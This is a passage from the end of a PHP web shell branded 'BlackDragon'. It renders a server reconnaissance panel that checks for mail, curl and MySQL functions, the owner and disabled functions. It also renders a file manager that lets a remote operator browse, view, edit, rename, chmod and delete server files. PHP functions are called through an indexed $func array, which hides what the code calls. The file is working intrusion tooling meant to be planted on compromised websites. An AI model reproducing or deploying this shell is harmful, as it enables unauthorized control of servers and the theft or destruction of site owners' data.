$func[25]('mail') ? 'ON' : 'OFF' ?> Curl > <?= $func[25]('curl_version') ? 'ON' : 'OFF' ?> Owner > <?= $func[36](); ?> MySQL > <?= $func[25]('mysql_connect') ? 'ON' : 'OFF' ?> Disable Function > <?= $show_ds ?></textarea> <br> *ReClick For Close <br> File : BlackDragon <?= $_SERVER['SCRIPT_NAME'] ?> </div> </div> </div> </div> <div class="table-responsive"> <table class="table table-hover table-dark text-light"> <thead> <tr> <td style="width:35%">Name</td> <td style="width:10%">Type</td> <td style="width:10%">Size</td> <td style="width:13%">Owner/Group</td> <td style="width:10%">Permission</td> <td style="width:13%">Last Modified</td> <td style="width:9%">Actions</td> </tr> </thead> <tbody class="text-nowrap"> <?php foreach ($dirs as $dir) : if (!is_dir($dir)) continue; ?> <tr> <td> <?php if ($dir === '..') : ?> <a href="?dir=<?= $func[22]($path); ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a> <?php elseif ($dir === '.') : ?> <a href="?dir=<?= $path; ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a> <?php else : ?> <a href="?dir=<?= $path . '/' . $dir ?>" class="text-decoration-none text-light"><i class="fa fa-folder"></i> <?= $dir ?></a> <?php endif; ?> </td> <td class="text-light"><?= $func[8]($dir) ?></td> <td class="text-light">-</td> <td class="text-light"><?= $func[35]($dir) ?></td> <td class="text-light"><?= $func[11]($func[10]('%o', $func[6]($dir)), -4); ?></td> <td class="text-light"><?= $func[23]("Y-m-d h:i:s", $func[7]($dir)); ?></td> <td> <?php if ($dir != '.' && $dir != '..') : ?> <div class="btn-group"> <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a> <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a> </div> <?php elseif ($dir === '.') : ?> <div class="btn-group"> <a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-folder-plus"></i></a> <a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-plus"></i></a> <a data-bs-toggle="collapse" href="#newInfoServer" role="button" aria-expanded="false" aria-controls="newInfoServer" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-info"></i></a> </div> <?php endif; ?> </td> </tr> <?php endforeach; ?> <?php foreach ($dirs as $dir) : if (!is_file($dir)) continue; ?> <tr> <td> <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=view" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> <?= $dir ?></a> </td> <td class="text-light"><?= ($func[25]('mime_content_type') ? $func[24]($dir) : $func[8]($dir)) ?></td> <td class="text-light"><?= $func[26]($dir) ?></td> <td class="text-light"><?= $func[35]($dir) ?></td> <td class="text-light"><?= $func[11]($func[10]('%o', $func[6]($dir)), -4); ?></td> <td class="text-light"><?= $func[23]("Y-m-d h:i:s", $func[7]($dir)); ?></td> <td> <?php if ($dir != '.' && $dir != '..') : ?> <div class="btn-group"> <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=edit" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-edit"></i></a> <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a> <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a> </div> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <div class="text-light">© BlackDragon <script type='text/javascript'>var creditsyear = new Date();document.write(creditsyear.getFullYear());</script></div> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script> <script> <?php if (isset($_SESSION['message'])) : ?> Swal.fire( '<?= $_SESSION['status'] ?>', '<?= $_SESSION['message'] ?>', '<?= $_SESSION['class'] ?>' ) <?php endif; clear(); ?> function deleteConfirm(url) { event.preventDefault() Swal.fire({ title: 'Are you sure?', icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { window.location.href = url } }) } function jscopy() { var jsCopy = document.getElementById("CopyFromTextArea"); jsCopy.focus(); jsCopy.select(); document.execCommand("copy"); } </script> </body> </html>